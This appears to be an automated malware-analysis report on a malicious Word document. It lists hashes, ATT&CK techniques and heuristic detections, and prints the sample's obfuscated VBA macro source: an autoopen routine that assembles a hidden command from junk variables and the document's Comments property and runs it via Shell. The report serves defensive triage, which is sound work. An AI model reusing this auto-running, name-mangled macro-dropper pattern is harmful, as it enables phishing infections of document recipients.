Office (OLE) malware analysis — malicious · b9ad5dcb200ff75b

MALICIOUS

Office (OLE)

64.0 KB Created: 2017-10-04 06:40:00 Authoring application: Microsoft Office Word First seen: 2018-04-30

MD5: cff64c93608976bd3504615370fdeac7 SHA-1: 06be11cdce07b3b6259de01179f526463bd4f2e2 SHA-256: b9ad5dcb200ff75b03cb882c0ce4876ada5fe89ac866ddb37cde4679585fcda1

212 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'macros.bas' script includes an 'autoopen' subroutine which is designed to execute automatically. Heuristics indicate a potential Shell call and a reference to PowerShell, suggesting the macro attempts to launch an external process. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports the malicious nature and points to a macro-based downloader.

Heuristics 8

ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

yeEWAHAxAC = "AKhBdzGr" + "cDpxyLSc" + "YfVkWLyKPck" + "NwLtDchSPP" + eHNkvkz = "kwTgbRNTWdS" + "AWBZtHbnn" + "tMDBPLB" + "cAxrcvRx" + HstxptkT = "ZzuvYuGG" + "PKfPGSeBeu" + "BshBLAB" + "CYpdTFZs" + "BDwaPePXKgG"
VBA.Shell$ "" + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + DxurmNxTt + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + yPhDUVeb, 0
drRSShcDmMk = "vvNbhXmdBH" + "dNaRercVH" + "DUVLMgxP" + "hMweKgKYR" + fmtCFFPTwCd = "LkGALYwGw" + "ycMdvvXBWge" + "ecRbKmrp" + "nUPfDgpwAcL" + XGvGyMcR = "dtgFstKXxB" + "eLMmuePvKpw" + "gPnHWdGL" + "YWthAfY" + "RFkZzwr"

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "Module1"
Sub autoopen()
MgUEUvnh
```
Reference to PowerShell high SC_STR_POWERSHELL

Reference to PowerShell
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4157 bytes
SHA-256: `7248c18cc17278c8776cba8ee2f22865cf5c21b2259db0fdb07267b194e9411f`
Detection ClamAV: No threats found Obfuscation or payload: likely 217 of 260 identifiers look randomly generated (e.g. 'xfAXWmbcbyZ') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub autoopen() MgUEUvnh End Sub Function MgUEUvnh() mzHpazLy = "pVeEmEDkAy" + "BNZLmSWyDwZ" + "xSGNWVRL" + "bYEuATu" + tFnvZprt = "RBYXVMNL" + "SpKUcRZ" + "RxDvtPNLkBh" + "sENbftgLte" + eUvvgCCAe = "vFTpRmxdyS" + "kYFcKbdcFg" + "nvBsptYu" + "gPdUEEndVP" + "dPzwvvLUC" ETGutfB = "vEfZrbcx" + "rBHRTrFPk" + "rVzxgbHx" + "arHbEkLPUZh" + SsektFxNC = "yfuHUUhpTh" + "PpkSbgUHy" + "LkykTRxHNBu" + "UZPvXAPUR" + hmhHkmXNBm = "AdwhNFDaw" + "DxScepg" + "TfRtAzyv" + "tdtXDeGUYZ" + "ueHMsREVdgd" spBwukgWm = "UVGRyFdxu" + "SmUkzHYL" + "kSSfvYRvdU" + "zmbYHWd" + YYSLkWVk = "DRWRusyfb" + "ELgvuhRHzkp" + "NWgBGZwsD" + "gGHBzUuaC" + "vZGUsRGzW" xzwGnrA = "uCUVtPWsUky" + "fGYwrsVvWn" + "vmkcBRSESZ" + "ANwSCYhgaN" + xfAXWmbcbyZ = "czzuWdw" + "uNTYVcwXZ" + "pnksykmwC" + "MbvcxpM" + TawLEXbp = "ZwymxyPa" + "ppuNSduhK" + "vuZPbhUfe" + "upBxNwC" + "NxYcHTaUk" fDhPxYXX = "UrWDMfTnUVe" + "NhFPnGHzWSD" + "HTtMfhmBA" + "upPctUwXrc" + LWTXSgUN = "rPbnYyk" + "skEwBdRtKXf" + "BXdeutnb" + "uBZwxXpB" + "bFnLFmaznCk" XLGPYxnp = "tPafdPAfTG" + "yVAvGgzW" + "nyXhXfT" + "mXYVTHMeSML" + HsUsCddBnyE = "zgMrrAKwf" + "mMKMyPZNG" + "enAdKXVP" + "LZwANdfFYn" + "NaSsAZC" DxurmNxTt = "" + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + ynYUNnRDB acfMTexpL = "nMgKhMeRf" + "LfpAmPKmYx" + "cMXKPybbT" + "dMSCRFeB" + pYZrPnd = "XgssDEaNX" + "sBuZGrKrGWR" + "YskfEyESgCs" + "unwvrwySAK" + "WZSNtbZb" yeEWAHAxAC = "AKhBdzGr" + "cDpxyLSc" + "YfVkWLyKPck" + "NwLtDchSPP" + eHNkvkz = "kwTgbRNTWdS" + "AWBZtHbnn" + "tMDBPLB" + "cAxrcvRx" + HstxptkT = "ZzuvYuGG" + "PKfPGSeBeu" + "BshBLAB" + "CYpdTFZs" + "BDwaPePXKgG" VBA.Shell$ "" + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + DxurmNxTt + EbdWDFFTS + gUYxzUVLX + dtgmDwd + MuXdnNaGF + VsBuPhMsfXu + naMGpySUfb + FncVhww + bHKYbuUHY + rTwVggkD + SgsDnWv + KxnThFyZ + HcLbdnPkw + yPhDUVeb, 0 drRSShcDmMk = "vvNbhXmdBH" + "dNaRercVH" + "DUVLMgxP" + "hMweKgKYR" + fmtCFFPTwCd = "LkGALYwGw" + "ycMdvvXBWge" + "ecRbKmrp" + "nUPfDgpwAcL" + XGvGyMcR = "dtgFstKXxB" + "eLMmuePvKpw" + "gPnHWdGL" + "YWthAfY" + "RFkZzwr" ZWMeySFpsV = "TxzUGWxzSfN" + "ZKGDAsRm" + "ZRmKZtHt" + "XRcTEWEtxzv" + GcNWeNN = "hVBTLFWkDUn" + "VCvdfvfMSS" + "KgGdXGA" + "LHRaftE" + "tEexpRyaCd" MMWkhunuzn = "ntwGmwfnfF" + "gZzsMKCa" + "dhZfANRaGtc" + "tNRDZMeYh" + gdMmtnCzseV = "UHfwdvBMuA" + "ycycMrvSwr" + "xmDUHvy" + "nNWYecV" + zMWkppEPcm = "baEyrLttLnr" + "PsZhXBtuNx" + "XPMZrvxSbV" + "RDuzRRaH" + "PMhwNtx" bkXHxAXR = "yGYzGVTzepW" + "XmryyfVmWt" + "MvGaFENBRNE" + "xfMfkEB" + taCfvnc = "BnUVgFzU" + "GMAkvFwxusN" + "ysdACEgZadV" + "GbYEdEuEd" + xtUscwkzYP = "nYXmFPDr" + "hxkHHWfHpW" + "gnCXGBsg" + "PSkZuYZnTC" + "YXYrUYXB" rPdNMbSTsL = "kTpMzECUX" + "MBkhpNDVxL" + "mKCeXPgHH" + "DXztpzKfxDU" + kBFfVzYkG = "NTCCecx" + "EvwrhRrwMe" + "SLfyVwaFxw" + "KxEtELRM" + wPMgFXD = "CzSVMwuU" + "eUcPTTFmkht" + "tLPLvgFMUTg" + "dWkhUvdKPLm" + "KVseUYE" cUHGPxKTWss = "skmLXpA" + "XuAbgRKZcP" + "aBPGUCFR" + "kpBHNWutns" + ebegunN = "DgwXVwyy" + "fZYnMyzzfgx" + "ShDxXwZG" + "KxLmMCMP" + "kryTcmz" EDuYKXTmupG = "ZbpwmLcBDt" + "GEFdCerh" + "bankGdZ" + "pLEUYCRMzN" + mfKSZbu = "TckFACCA" + "tfzCLXEewaS" + "DyZdREUCa" + "KdNXChP" + WPBcNUrDHL = "syyBKYgt" + "ZfwtwZgY" + "ZbhhbSwxYS" + "mSUMFFFkxxv" + "DXPrVAZrGtM" ArEfRMWWXC = "wCLrHMVnwh" + "kmzgVndkC" + "XGCZYCszwCv" + "XMVyaGghz" + uthkVpYG = "KAxbEEtfBBZ" + "FeuGASEVnbx" + "EsyThCXCY" + "PAcrKsEn" + CYrtTSe = "cwwCTUpbGBd" + "eSFrrEvftc" + "YAHWCsCzw" + "zdxHLYFFXZ" + "CZdWTpv" End Function

Open this report in the interactive analyzer, or submit your own file for analysis.